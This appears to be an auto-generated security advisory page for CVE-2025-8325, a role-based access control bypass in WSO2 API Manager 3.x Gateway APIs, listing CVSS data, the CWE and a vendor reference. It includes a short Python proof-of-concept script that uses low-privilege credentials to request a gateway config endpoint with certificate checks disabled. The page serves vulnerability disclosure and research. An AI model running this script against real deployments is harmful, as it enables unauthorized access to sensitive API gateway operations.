Security Vulnerability Report
CVE-2025-8325 CVSS 6.3 MEDIUM

CVE-2025-8325

Published: 2026-05-11 10:16:13
Last Modified: 2026-05-11 10:16:13
Source: ed10eef1-636d-4fbe-9993-6890dfa878f8

Description

The software fails to enforce role-based access controls for certain Gateway API invocations. Users with the 'Internal/Everyone' role can invoke these APIs, bypassing intended permission checks. This same vulnerability also affects Internal Service APIs, potentially exposing them in WSO2 APIM 3.x versions. A malicious actor with a valid user account on a vulnerable deployment can perform sensitive operations against the Gateway REST API regardless of their actual roles or privileges. This could lead to unintended behavior or misuse, particularly in production environments.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No CPE configuration data available.

Affected product (per the description): WSO2 API Manager 3.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit for CVE-2025-8325: WSO2 API Manager RBAC Bypass
# Target: Vulnerable WSO2 Gateway API endpoint
target_url = "https://<target-host>:9443/api/am/gateway/v1/configs/endpoint"

# Credentials for a user with 'Internal/Everyone' role (Low privilege)
username = "low_priv_user"
password = "user_password"

# Send request to sensitive API without admin rights
try:
    response = requests.get(
        target_url,
        auth=(username, password),
        verify=False  # Ignore SSL certificate verification if needed
    )
    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Response:", response.text)
    else:
        print("[-] Exploit failed. Status Code:", response.status_code)
except Exception as e:
    print("[-] An error occurred:", str(e))
```

Weakness

CWE-281

References

https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4401/